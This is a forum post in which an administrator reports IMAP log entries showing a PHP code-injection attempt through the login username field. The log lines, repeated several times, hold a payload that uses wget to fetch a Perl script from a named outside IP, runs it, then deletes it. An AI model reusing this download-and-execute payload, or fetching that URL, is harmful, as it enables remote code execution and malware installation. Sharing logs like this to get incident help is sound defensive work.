Author Topic: Potential Perl malware? (Read 1519 times)

fossxplorer · « **on:** 2015-11-23, 21:04:01 »

Today i noticed the following:

Nov 23 20:47:31 mail imap4: INFO: LOGIN FAILED, user=<?php passthru("cd /tmp;wget http://188.138.41.134/mad.exe;perl /tmp/mad.exe;perl mad.exe;rm -rf mad.exe"); ?>, ip=[127.0.0.1]
Nov 23 20:47:36 mail imap4: INFO: LOGIN FAILED, user=<?php passthru("cd /tmp;wget http://188.138.41.134/mad.exe;perl /tmp/mad.exe;perl mad.exe;rm -rf mad.exe"); ?>, ip=[127.0.0.1]
Nov 23 20:47:36 mail authlib: user invalid <?php passthru("cd
Nov 23 20:47:42 mail authlib: user invalid <?php passthru("cd
Nov 23 20:47:42 mail imap4: INFO: LOGIN FAILED, user=<?php passthru("cd /tmp;wget http://188.138.41.134/mad.exe;perl /tmp/mad.exe;perl mad.exe;rm -rf mad.exe"); ?>, ip=[127.0.0.1]
Nov 23 20:47:47 mail imap4: INFO: LOGOUT, ip=[127.0.0.1], rcvd=434, sent=388
Nov 23 20:47:47 mail imap4: tcpserver: end 20600 status 0
Nov 23 20:47:47 mail imap4: tcpserver: status: 0/40

The Perl script is at http://188.138.41.134/mad.exe.
i've blocked this IP in CSF, but still i see those lines in the maillog.

Anyone else seen this? It's obviously injecting PHP code through mail server.

Author Topic: Potential Perl malware? (Read 1519 times)

fossxplorer

Potential Perl malware?